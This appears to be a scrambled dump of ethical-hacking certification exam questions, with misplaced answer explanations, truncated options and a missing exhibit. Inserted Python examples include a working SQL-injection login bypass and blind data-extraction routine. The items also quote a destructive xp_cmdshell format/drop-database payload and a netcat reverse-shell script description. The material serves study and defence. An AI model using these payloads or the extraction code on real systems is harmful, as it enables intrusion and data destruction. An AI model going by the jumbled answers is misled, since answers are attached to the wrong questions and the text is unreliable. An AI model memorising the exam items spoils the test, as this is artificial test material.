For example, row '050' reads STRIDER, which is 53 54 52 49 44 45 52, and that gives you the conversion for the 'I' and 'S' characters ('49' and '53'). Let's imagine three companies (A, B and C), all competing in a challenging global environment. Companies A and B are working together on a product that will give them a major competitive advantage. Company A has a secure DNS server, while company B's DNS server is vulnerable to spoofing. With a spoofing attack on company B's DNS server, company C gains access to outgoing e-mail from company B. How do you prevent DNS spoofing? A. Install a DNS logger and track vulnerable packets B.
Disable DNS timeouts C. Install a DNS anti-spoofer D. Disable DNS zone transfers. You work as a security technician at testking.net. While doing web application testing, you may need to look through many web pages online, which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation? A. Use mget to download all pages locally for further inspection.
B. Use wget to download all pages locally for further inspection. C. Use get. to download all pages locally for further inspection.
D. Use get to download all pages locally for further inspection. Answer: B. Wget is a utility for mirroring web sites. Plain get does not work: for the actual FTP command to work there has to be a space between get and the file name (so 'get.' fails), and 'get;' is just bogus, a C-style call written 100% wrong.
mget is a command used from within ftp itself, ruling out A. That leaves B, wget, which is designed for mirroring and downloading files, especially web pages; used with the -r (recursive) or -m (mirror) option (e.g.
wget -m http://www.testking.net) it can mirror a site, all except protected portions of course. Note: GNU Wget is a free network utility to retrieve files from the World Wide Web using HTTP and FTP, and can be used to make mirrors of archives and home pages, enabling work in the background after having logged off. Answer: D (this explanation belongs to the nmap OS-guess question that appears later in this set). Explanation: If the answer were A, nmap would have guessed it, since its signature database covers Microsoft systems; the host not being firewalled makes no difference.
The host is not running Linux or Solaris? Well, it very well could be. The host is not properly patched? That is the closest. nmap's OS detection works by fingerprinting the TCP/IP stack (TCP ISN sampling, IP ID generation, TCP options and window sizes, among other probes); if the stack has been modified to randomize its ISNs, or a program is rewriting them, OS detection will fail. If the IP IDs are altered as well, the fingerprint no longer matches a single entry in the database, which is exactly the 'too many signatures match' result shown. You have just received an assignment for an assessment at a company site. The company's management is concerned about external threats and wants to take appropriate steps to ensure security is in place.
However, management is also worried about possible threats from inside the site, specifically from employees in different departments. What kind of assessment will you be performing? A. Black box testing B. Black hat testing C. Gray box testing D. Gray hat testing E. White box testing F.
White hat testing. Answer: B (this explanation belongs to the spoofed-telnet question that appears later in this set). Explanation: The question does not tell you what state the scanner reports for the port. With nmap a port is 'open', 'closed' or 'filtered', and a port can be open yet filtered by a stateful packet filter (e.g. Netfilter on Linux, ipfilter on BSD); but since both nmap and hping2 confirm that port 23 is listening, a firewall block (A) is unlikely. C and D do not make sense for this question and are bogus. That leaves B: you can forge TCP segments with a spoofed source address, but the SYN/ACK and every later segment go to the spoofed address, so the attacker cannot complete the three-way handshake and never gets a telnet session. Answer: B Explanation: Okay, this is a tricky question.
We say B, DES, but it could be A, 'MD4', depending on what they are asking. Windows 2000/XP does not keep users' passwords as such but as hashes, i.e. as a 'checksum' of the password. Let's look at password storage in more detail.
The most interesting structure in the complex SAM file layout is the so-called V-block. It is 32 bytes long and holds the two password hashes: the NT hash (16 bytes), used for local logon, and the LanMan hash, or simply LM hash (also 16 bytes), used when authenticating to shared resources on other computers.
These hashes are formed as follows. NT hash formation: 1. The user's password is converted to a Unicode (UTF-16LE) string. 2. An MD4 hash is computed over that string. 3. The resulting 16-byte hash is encrypted with DES, using a key derived from the user's RID (user identifier), before it is stored.
This was necessary to obtain different stored values for users who have the same password. Remember that all users have different RIDs (the built-in Administrator account has RID 500, the built-in Guest account has RID 501, and all other users get RIDs 1000, 1001, 1002 and so on). LM hash formation: 1. The user's password is converted to upper case and padded with nulls to 14 bytes. 2. The result is split into two 7-byte halves, each of which is used as a DES key to encrypt the fixed string 'KGS!@#$%'; each half yields 8 bytes, giving a 16-byte hash in total. 3. The LM hash is then additionally encrypted in the same way as in step 3 of the NT hash algorithm. In the context of PKI, when Sven wishes to send a secret message to Bob, he looks up Bob's public key in a directory and uses it to encrypt the message before sending it off.
Bob then uses his private key to decrypt and read the message. No one listening in can decrypt it.
Anyone can send an encrypted message to Bob, but only Bob can read it. Thus, although many people may know Bob's public key and use it to verify Bob's signature, they cannot discover Bob's private key and use it to forge digital signatures. What does this principle refer to?
A. Irreversibility B. Non-repudiation C. In an attempt to secure his 802.11b wireless network, Ulf decides to use strategic antenna positioning.
He places the antennas for the access points near the center of the building. For access points near the outer edge of the building he uses semi-directional antennas that face the building's center.
A large parking lot and an outlying field surround the building, extending half a mile around it. Ulf figures that with this antenna placement his wireless network will be safe from attack. Which of the following statements is true?
A. With the 300 feet limit of a wireless signal, Ulf's network is safe. B. Wireless signals can be detected from miles away; Ulf's network is not safe. C. Ulf's network will be safe, but only if he does not switch to 802.11a. D. Ulf's network will not be safe until he also enables WEP. John has scanned the web server with Nmap. However, he could not gather enough information to accurately identify the operating system running on the remote host.
What would you suggest to John to help identify the OS on the remote web server? A. Connect to the web server with a browser and look at the web page. B. Connect to the web server with an FTP client.
C. Telnet to port 8080 on the web server and look at the default page code. D. Telnet to an open port and grab the banner. Jack Hacker wants to break into testking's computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at testking, pretending to be an administrator from testking. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him 'just to double check our records'. Jane does not suspect anything amiss and parts with her password. Jack can now access testking's computers with a valid user name and password and steal the cookie recipe.
What kind of attack is being illustrated here? (Choose the best answer) A. Reverse Psychology B. Reverse Engineering C. Social Engineering D.
Spoofing Identity E. Faking Identity. Statistics from cert.org and other leading security organizations have clearly shown a steady rise in the number of hacking incidents perpetrated against companies. What do you think is the main reason behind the significant increase in hacking attempts over the past years?
A. It is getting more challenging and harder to hack for non-technical people. B. There is a phenomenal increase in processing power. C. New TCP/IP stack features are constantly being added. D. The ease with which hacker tools are available on the Internet.
Steven the hacker realizes that the network administrator of testking is using Syskey to protect the organization's resources on the Windows 2000 Server. Syskey independently encrypts the hashes, so that physical access to the server, tapes or ERDs is only the first step to cracking the passwords. Steven must break the encryption used by Syskey before he can attempt brute force or dictionary attacks on the hashes. Steven runs a program called 'SysCracker' against the Windows 2000 Server machine to crack the hash used by Syskey.
He needs to configure the encryption level before he can launch the attack. How many bits does Syskey use for encryption? The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. From the options given below, choose the one that best interprets the following entry: Apr 26 06:43:05 6282 IDS181/nops-x86: 63.226.
172.16.1.107:53 (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of the attack.) Interpret the following entry: Apr 26 06:43:05 6283: IDS181/nops-x86: 63.226. 172.16.1.107.53 A. An IDS evasion technique B. A buffer overflow attempt C.
A DNS zone transfer D. Data being retrieved from 63.226.81.13. You are having problems retrieving results after performing port scanning during internal testing. You verify that there are no security devices between you and the target system.
When both stealth and connect scanning do not work, you decide to perform a NULL scan with Nmap. The first few systems scanned show all ports open. Which one of the following statements is probably true? A. The systems have all ports open. B. The systems are running a host-based IDS. C. The systems are web servers.
D. The systems are running Windows. Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page.
He first attempts to use the 'echo' command simply to overwrite index.html and is unsuccessful. He then attempts to delete the page and makes no progress. Finally, he tries to overwrite it with another page, again in vain. What is the probable cause of Bill's problem? A. The system is a honeypot.
B. There is a problem with the shell and he needs to run the attack again. C. You cannot use a buffer overflow to deface a web page.
D. The HTML file has read-only permissions. In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such as L0phtCrack or John the Ripper and running it against user accounts located by the application. The larger the word and word-fragment selection, the more effective the dictionary attack is. The brute force method is the most inclusive, although slow; it usually tries every possible letter and number combination in its automated exploration. If you used brute force and dictionary methods combined to produce variations of words, what would you call such an attack? A. Full Blown B.
Jim is having no luck performing a penetration test on testking's network. He is running the tests from home and has downloaded every security scanner he could lay his hands on. Despite knowing the IP range of all the systems and the exact network configuration, Jim is unable to get any useful results. Why is Jim having these problems? A. Security scanners are not designed to do testing through a firewall. B. Security scanners cannot perform vulnerability linkage. C. Security scanners are only as smart as their database and cannot find unpublished vulnerabilities.
D. All of the above. Scanning for services is an easy job for Bob, as there are so many tools available on the Internet. In order to check the vulnerability of testking, he went through a few scanners that are currently available. Here are the scanners he uses: 1. Axent's NetRecon 2. SARA, by Advanced Research Corporation 3. VLAD the Scanner, by Razor. However, there are many other ways to make sure the services that have been scanned are identified more accurately and in more detail. What would be the best method to accurately identify the services running on a victim host?
A. Using Cheops-ng to identify the devices of testking. B. Using the manual method of telnetting to each of the open ports of testking.
C. Using a vulnerability scanner to probe each port to verify or figure out which service is running for testking. D. Using the default port and OS to make a best guess of what services are running on each port for testking.
What do you conclude from the nmap results below?

Starting nmap V. 3.10ALPHA0 (www.insecure.org/map/)
(The 1592 ports scanned but not shown below are in state: closed)
Port     State  Service
21/tcp   open   ftp
25/tcp   open   smtp
80/tcp   open   http
443/tcp  open   https
Remote operating system guess: Too many signatures match to reliably guess the OS.
Nmap run completed - 1 IP address (1 host up) scanned in 91.66 seconds

A. The system is a Windows Domain Controller. B. The system is not firewalled. C. The system is not running Linux or Solaris.
D. The system is not properly patched. Clive has been monitoring his IDS and sees a huge number of ICMP Echo Reply packets being received on the external gateway interface. Further inspection reveals that they are not responses to the internal hosts' requests but simply responses coming from the Internet. What could be the most likely cause?
A. Someone has spoofed Clive's IP address while doing a smurf attack. B. Someone has spoofed Clive's IP address while doing a land attack. C. Someone has spoofed Clive's IP address while doing a fraggle attack. D. Someone has spoofed Clive's IP address while doing a DoS attack. Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds them abnormal. If you were the penetration tester, why would you find this abnormal?
05/20-17:34 192.160.13.4:31337 -> 172.16.1.101:1 TCP TTL:44 TOS:0x10 ID:242 FRP Seq: 0xA1D95 Ack: 0x53 Win: 0x400
05/20-17:79 192.160.13.4:31337 -> 172.16.1.101:1024 TCP TTL:44 TOS:0x10 ID:242 FRP Seq: 0xA1D95 Ack: 0x53 Win: 0x400

What is odd about this attack? (Choose the most appropriate statement) A. This is not a spoofed packet, as the IP stack has increasing numbers for the three flags. B. This is Back Orifice activity, as the scan comes from port 31337. C. The attacker wants to avoid creating a sub-carrier connection that is not normally valid. D. These packets were created by a tool; they were not created by a standard IP stack.
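The checks a tester applies to those two alerts can be written down and run over a whole alert file. The following is an added Python example, not part of the original question; the three alert lines are constructed to match the shape of the Snort output above (the third is a normal SYN from another host, for contrast), and the field layout, regular expression and rule wording are this example's own assumptions about Snort's single-line alert format.

```python
"""Flag crafted TCP segments in Snort-style alert lines: per-packet flag sanity
checks plus cross-packet checks for IP ID and sequence number reuse."""
import re
from collections import Counter, defaultdict

# Constructed alert lines patterned on the two Snort entries above; the third is a
# normal SYN from a different host, included for contrast.
ALERTS = """
05/20-17:34:01.000001 192.160.13.4:31337 -> 172.16.1.101:1 TCP TTL:44 TOS:0x10 ID:242 ****PR*F Seq: 0xA1D95 Ack: 0x53 Win: 0x400
05/20-17:34:01.000002 192.160.13.4:31337 -> 172.16.1.101:1024 TCP TTL:44 TOS:0x10 ID:242 ****PR*F Seq: 0xA1D95 Ack: 0x53 Win: 0x400
05/20-17:34:09.500000 10.0.0.7:52114 -> 172.16.1.101:80 TCP TTL:64 TOS:0x0 ID:7311 ******S* Seq: 0x3C2F1A90 Ack: 0x0 Win: 0xFFFF
"""

# Snort prints the TCP flags in the fixed order 1 2 U A P R S F, with '*' for a clear bit.
LINE = re.compile(
    r"(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+) "
    r"TCP TTL:(?P<ttl>\d+) TOS:(?P<tos>0x[0-9A-Fa-f]+) ID:(?P<id>\d+) (?P<flags>[12UAPRSF*]{8}) "
    r"Seq: (?P<seq>0x[0-9A-Fa-f]+) Ack: (?P<ack>0x[0-9A-Fa-f]+) Win: (?P<win>0x[0-9A-Fa-f]+)"
)


def parse_alerts(text):
    """Turn alert lines into dicts with numeric fields and a set of flag letters."""
    packets = []
    for line in text.strip().splitlines():
        m = LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised alert line: {line!r}")
        p = m.groupdict()
        for key in ("sport", "dport", "ttl", "id"):
            p[key] = int(p[key])
        for key in ("tos", "seq", "ack", "win"):
            p[key] = int(p[key], 16)
        p["flags"] = set(p["flags"]) - {"*"}
        packets.append(p)
    return packets


def analyze(packets):
    """Return, for each packet, the list of reasons it does not look stack-generated."""
    findings = [[] for _ in packets]
    # Per-packet checks: flag combinations a real stack never emits, and a telltale port.
    for i, p in enumerate(packets):
        fl = p["flags"]
        if {"F", "R"} <= fl:
            findings[i].append("FIN and RST set together: a real TCP stack never sends this combination")
        if "S" in fl and ("F" in fl or "R" in fl):
            findings[i].append("SYN combined with FIN/RST: invalid handshake segment")
        if "A" not in fl and fl != {"S"}:
            findings[i].append("no ACK on a non-SYN segment: every segment after the handshake carries ACK")
        if p["sport"] == 31337:
            findings[i].append("source port 31337: the Back Orifice / 'elite' port favoured by tools")
    # Cross-packet checks, grouped by source host: a stack increments or randomizes
    # the IP ID and picks a fresh ISN per connection; tools often hard-code both.
    by_src = defaultdict(list)
    for i, p in enumerate(packets):
        by_src[p["src"]].append(i)
    for idxs in by_src.values():
        ids = Counter(packets[i]["id"] for i in idxs)
        seqs = Counter(packets[i]["seq"] for i in idxs)
        for i in idxs:
            p = packets[i]
            if ids[p["id"]] > 1:
                findings[i].append(f"IP ID {p['id']} reused across {ids[p['id']]} packets from {p['src']}")
            if seqs[p["seq"]] > 1:
                findings[i].append(f"sequence number {p['seq']:#x} repeated on segments to different ports")
    return findings


if __name__ == "__main__":
    pkts = parse_alerts(ALERTS)
    for p, reasons in zip(pkts, analyze(pkts)):
        print(f"{p['src']}:{p['sport']} -> {p['dst']}:{p['dport']}", reasons or "looks normal")
```

Only the two packets from 192.160.13.4 are reported; the SYN from 10.0.0.7 passes every check, which is what makes the rules usable on a busy sensor.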
You are scanning into the target network for the first time. You find very few conventional ports open. When you attempt to perform traditional service identification by connecting to the open ports, it yields either unreliable or no results.
You are unsure of which protocols are being used. You need to discover as many different protocols as possible.
Which kind of scan would you use to achieve this? (Choose the best answer) A. Nessus scan with TCP based pings.
B. Nmap scan with the -sP (Ping scan) switch. C. Netcat scan with the -u -e switches. D. Nmap with the -sO (Raw IP packets) switch. A client has approached you with penetration test requirements. They are concerned about the possibility of an external threat and have invested considerable resources in protecting their Internet exposure. However, their main concern is the possibility of an employee elevating his/her privileges and gaining access to information outside of his/her own department.
What kind of penetration test would you recommend that would best address the client's concern? A Black Box test B. A Black Hat test C.
A Grey Box test D. A Grey Hat test E. A White Box test F. A White Hat test. Bob is acknowledged as a hacker of repute and is popular among visitors to 'underground' sites.
Bob is willing to share his knowledge with those who are willing to learn, and many have expressed their interest in learning from him. However, this knowledge carries a risk, as it can be used for malevolent attacks as well. In this context, what would be the most effective method to bridge the knowledge gap between the 'black' hats or crackers and the 'white' hats or computer security professionals? (Choose the best answer) A. Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards. B. Hire more computer security monitoring personnel to monitor computer systems and networks. C. Make obtaining a computer security certification or accreditation easier to achieve, so more individuals feel that they are part of something larger than life.
D. Train more National Guard and reservists in the art of computer security to help out in times of emergency or crisis. Peter extracts the SID list from a Windows 2000 Server machine using the hacking tool 'SIDExtractor'. Here is the output:

s-1-5-40-100 Johns
s-1-5-40-652 Rebecca
s-1-5-40-412 Sheela
s-1-5-40-999 Shawn
s-1-5-40-777 Somia
s-1-5-40-500 chang
s-1-5-40-555 Micah

From the above list, identify the user account with System Administrator privileges. You receive an e-mail with the following message: Hello Steve, We are having technical difficulty restoring user database records after the recent blackout.
Your account data is corrupted. Please log on to SuperEmailServices.com and change your password.
If you do not reset your password within 7 days, your account will be permanently disabled, locking you out of our e-mail services. Sincerely, Technical Support, SuperEmailServices. From this e-mail you suspect that the message was sent by a hacker, since you have been using their e-mail services for the last 2 years and they have never sent an e-mail like this. You also observe the URL in the message and confirm your suspicion about 0xde.0xad.0xbde.0xef, which looks like hexadecimal numbers. You immediately enter the following at a Windows 2000 command prompt: ping 0xde.0xad.0xbe.0xef. You get a response with a valid IP address.
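Working out what a dotted-hex host really is can be done with the same rules the resolver (inet_aton) applies, and the same code exposes the other disguises phishers use: a single 32-bit decimal, octal components, and a fake user-info prefix in front of the real host. The following is an added Python example, not part of the original question; normalize_ipv4 and host_from_url are this example's own names, and the sample URL with a bogus "SuperEmailServices.com@" prefix is constructed.

```python
"""Normalize the numeric host of an obfuscated URL to dotted decimal, following the
C-library inet_aton rules: hex (0x..), octal (leading 0) or decimal components,
in 1-, 2-, 3- or 4-part form."""
import re


def _component(token):
    """Parse one numeric component in C notation: 0x.. is hex, a leading 0 is octal,
    anything else is decimal. Rejects junk such as '08' or 'abc'."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", token):
        return int(token, 16)
    if re.fullmatch(r"0[0-7]*", token):
        return int(token, 8) if len(token) > 1 else 0
    if re.fullmatch(r"[1-9][0-9]*", token):
        return int(token, 10)
    raise ValueError(f"not a numeric component: {token!r}")


def normalize_ipv4(host):
    """Return 'a.b.c.d' for any numeric host form inet_aton accepts: 1 part (32 bits),
    2 parts (8 + 24 bits), 3 parts (8 + 8 + 16 bits) or 4 parts (8 bits each)."""
    parts = [_component(p) for p in host.split(".")]
    widths = {1: (32,), 2: (8, 24), 3: (8, 8, 16), 4: (8, 8, 8, 8)}
    if len(parts) not in widths:
        raise ValueError(f"{host!r} has {len(parts)} components; expected 1 to 4")
    value = 0
    for part, width in zip(parts, widths[len(parts)]):
        if part >= 1 << width:
            raise ValueError(f"component {part} does not fit in {width} bits")
        value = (value << width) | part
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def host_from_url(url):
    """Extract the host part of a URL, discarding any user-info before '@' (a classic
    trick: http://trusted.example@0xdeadbeef/ really goes to 0xdeadbeef)."""
    m = re.match(r"^[a-zA-Z][a-zA-Z0-9+.-]*://(?:[^/@]*@)?([^/:?#]+)", url)
    if not m:
        raise ValueError("no host in URL")
    return m.group(1)


if __name__ == "__main__":
    # Constructed sample URL shaped like the one in the phishing e-mail.
    url = "http://SuperEmailServices.com@0xde.0xad.0xbe.0xef/reset"
    print(host_from_url(url), "->", normalize_ipv4(host_from_url(url)))
    for form in ("0xdeadbeef", "3735928559", "0336.0255.0276.0357", "222.11386607"):
        print(f"{form:22} -> {normalize_ipv4(form)}")
```

The 0xbde component in the e-mail as quoted does not fit in 8 bits, which is why the question falls back to the 0xbe form when pinging; normalize_ipv4 raises on it rather than guessing.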
What is the obscured IP address in the e-mail URL? A. 222.173.190.239 B. 233.34.45.64 C. 54.23.56.55 D. An attacker is attempting to telnet into a corporation's system in the DMZ. The attacker doesn't want to get caught and is spoofing his IP address. After numerous tries he remains unsuccessful in connecting to the system.
The attacker rechecks that the target system is actually listening on Port 23 and he verifies it with both nmap and hping2. He is still unable to connect to the target system. What is the most probable reason?
A. The firewall is blocking port 23 to that system. B. He cannot spoof his IP and successfully use TCP. C. He needs to use an automated tool to telnet in. D. He is attacking an operating system that does not reply to telnet even when open. Jess the hacker runs L0phtCrack's built-in sniffer utility, which grabs SMB password hashes and stores them for offline cracking.
Once cracked, these passwords can provide easy access to whatever network resources the user account has access to. But Jess is not picking up hashes from the network. A. The network protocol is configured to use SMB signing. B. The physical network wire is fibre optic cable. C. The network protocol is configured to use IPsec. D. L0phtCrack SMB filtering only works through switches and not hubs. Exhibit:
MISSING. You are conducting a pen-test against a company's website using SQL injection techniques. You enter anything' or 1=1-- in the username field of an authentication form. This is the output returned from the server. What is the next step you should take? A. Identify the user context of the web application by running: AND USERNAME = 'dbo' B.
Identify the database and table name by running: AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109 C. Format the C: drive and delete the database by running: AND xp_cmdshell 'format c: /q /yes '; drop database myDB; -- D. Reboot the web server by running: AND xp_cmdshell 'iisreset -reboot'.
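What the anything' or 1=1-- probe does, and what the character-at-a-time extraction in option B looks like, as an added Python example on an in-memory SQLite database (not the original target, which is MS SQL; SQLite's unicode() and substr() stand in for ascii() and substring(), and the table contents, function names and payloads are this example's own). The vulnerable login is shown beside its parameterized fix.

```python
"""The login form from the question, rebuilt on an in-memory SQLite database: the
string-built query that  anything' or 1=1--  defeats, the parameterized fix, and the
boolean-blind extraction that option B describes."""
import sqlite3


def make_db():
    """Constructed sample accounts for this example."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("dbo", "hunter2")])
    return con


def vulnerable_login(con, username, password):
    """Concatenates user input into SQL. With username  anything' or 1=1--  the
    WHERE clause becomes  username = 'anything' or 1=1  and the rest is a comment."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone()          # a row means "logged in"


def safe_login(con, username, password):
    """Same query with bound parameters: the quote in the input is just a character."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


def oracle(con, condition):
    """True/false oracle through the vulnerable login. AND binds tighter than OR, so
    the injected clause is  username='anything' OR (1=1 AND condition)  and rows come
    back exactly when `condition` holds."""
    return vulnerable_login(con, f"anything' or 1=1 AND ({condition})--", "x") is not None


def blind_length(con, expr, max_len=64):
    """Binary-search the length of a scalar subquery's result."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(con, f"length(({expr})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(con, expr):
    """Recover the string one character at a time, seven oracle queries per
    character, the way option B's  ascii(...) > 109  comparison is meant to be used."""
    out = ""
    for pos in range(1, blind_length(con, expr) + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


# SQLite's catalogue query; on MS SQL the equivalent is the sysobjects query in option B.
FIRST_TABLE = "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1"

if __name__ == "__main__":
    con = make_db()
    print(vulnerable_login(con, "anything' or 1=1--", "wrong"))   # bypassed
    print(safe_login(con, "anything' or 1=1--", "wrong"))         # None
    print(blind_extract(con, FIRST_TABLE))                         # users
```

Every oracle query goes through the same login request the attacker already has, which is why the tautology probe is only the first step: once it works, the whole catalogue can be read out through a yes/no channel.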
In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. He concludes that since his access points require the client computer to have the proper SSID, this will prevent others from connecting to the wireless network. Unfortunately, unauthorized users are still able to connect to the wireless network. Why do you think this is possible? A. Bob forgot to turn off DHCP. B. All access points are shipped with a default SSID. C. The SSID is still sent inside both client and AP packets.
D. Bob's solution only works in ad-hoc mode. In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications. Immediately after the implementation, users begin complaining about how slow the wireless network is. After benchmarking the network's speed,
Bob discovers that throughput has dropped by almost half even though the number of users has remained the same. Why does this happen in the VPN-over-wireless implementation?
A. The stronger encryption used by the VPN slows down the network. B. Using a VPN with wireless doubles the overhead on an access point for all direct client-to-access-point communications. C. VPNs use larger packets than wireless networks normally do. D. Using a VPN on wireless automatically enables WEP, which causes additional overhead.
Bob, an administrator at testking, was furious when he discovered that his buddy Trent had launched a session hijack attack against his network and sniffed his communications, including administrative tasks such as configuring routers, firewalls and IDS via Telnet. Bob, being an unhappy administrator, seeks your help to ensure that attackers such as Trent will not be able to launch a session hijack at testking. Based on the above scenario, which would be your corrective measures? (Choose two) A. Use encrypted protocols, like those found in the OpenSSH suite. B. Implement the FAT32 filesystem for faster indexing and improved performance. C. Configure the appropriate anti-spoofing rules on gateways (internal and external).
D. Monitor ARP caches, using IDS products. Answer: A (the question and script exhibit this refers to are not preserved in this copy). The script being depicted is in Perl (both msadc.pl and the script they are using as a wrapper); $port, $your, $user, $pass and $host are variables that hold the port number of a DNS server, an IP address, a username and an FTP password, and $host is set to the first command-line argument (the string typed directly after the command). Essentially it connects to an FTP server, downloads nc.exe (netcat, the TCP/IP swiss-army knife) and uses nc to open a TCP port that spawns cmd.exe (the Win32 command shell on NT/2000/XP/2003). cmd.exe spawned this way requires no username or password and runs with the permissions of the account it is executed as (probably the IIS guest account in this instance, although it could be administrator). Lines starting with # are comments; notice the last line in particular: if the # were removed, the script would open a connection to itself, the host it is running on. Neil monitors his firewall rules and log files closely on a regular basis. Some users have complained to Neil that a few employees are visiting offensive web sites during work hours, without consideration for others.
Neil knows that he has an up-to-date content filtering system and that such access should not be authorized. What technique might these offenders be using to access the Internet without restriction? A. They are using UDP, which is always authorized at the firewall. B. They are using tunneling software, which allows them to carry protocols in a way that was not intended. C. They have been able to compromise the firewall, modify the rules and give themselves proper access.
D. They are using an older version of Internet Explorer that allows them to bypass the proxy server. Bob has a good understanding of cryptography, having worked with it for many years.
Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy and integrity and enable strong authentication, but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to illustrate to management that encryption will not address all of their security concerns? A. Bob can explain that a random generator can be used to derive cryptographic keys, but if it uses a weak seed value that is a form of programming error.
B. Bob can explain that using passwords to derive cryptographic keys is a form of programming error. C. Bob can explain that a buffer overrun is an example of a programming error and a common mistake associated with poor programming technique. D. Bob can explain that using a weak key management technique is a form of programming error. John is a keen administrator and has followed all of the best practices he could find on securing his Windows Server. He has renamed the Administrator account to a new name that he is sure cannot be easily guessed. However, there are people who attempt to compromise his newly renamed administrator account. How is it possible for a remote attacker to decipher the name of the administrator account if it has been renamed?
A. The attacker used the user2sid program. B. The attacker used the sid2user program. C. The attacker used nmap with the -V switch.
D. The attacker guessed the new name. An attacker runs the netcat tool to transfer a secret file between two hosts. Machine A: netcat -l -p 1234 1234. He is worried about the information being sniffed on the network. How would the attacker use netcat to encrypt the information before transmitting it on the wire? A. Machine A: netcat -l -p -s password 1234 1234 B. Machine A: netcat -l -e magickey -p 1234 1234 C. Machine A: netcat -l -p 1234 1234 -pw password D.
Use cryptcat instead of netcat. You are conducting a port scan on a subnet that has ICMP blocked. You have discovered 23 live systems, and after scanning each of them you notice that they all show port 21 in a closed state.
What should be the next logical step? A. Connect to open ports to discover applications.
B. Perform a ping sweep to identify any additional systems that might be up. C. Perform a SYN scan on port 21 to identify any additional systems that might be up. D. Rescan every computer to verify the results. Bob has been hired to perform a penetration test on testking.net. He begins by looking at the IP address ranges owned by the company and the details of its domain name registration. He then goes to newsgroups and financial web sites to see if they are leaking any sensitive information or have any technical details online. Within the context of penetration testing methodology, what phase is Bob involved in?
A. Passive information gathering B. Active information gathering C.
Attack phase D. Vulnerability Mapping.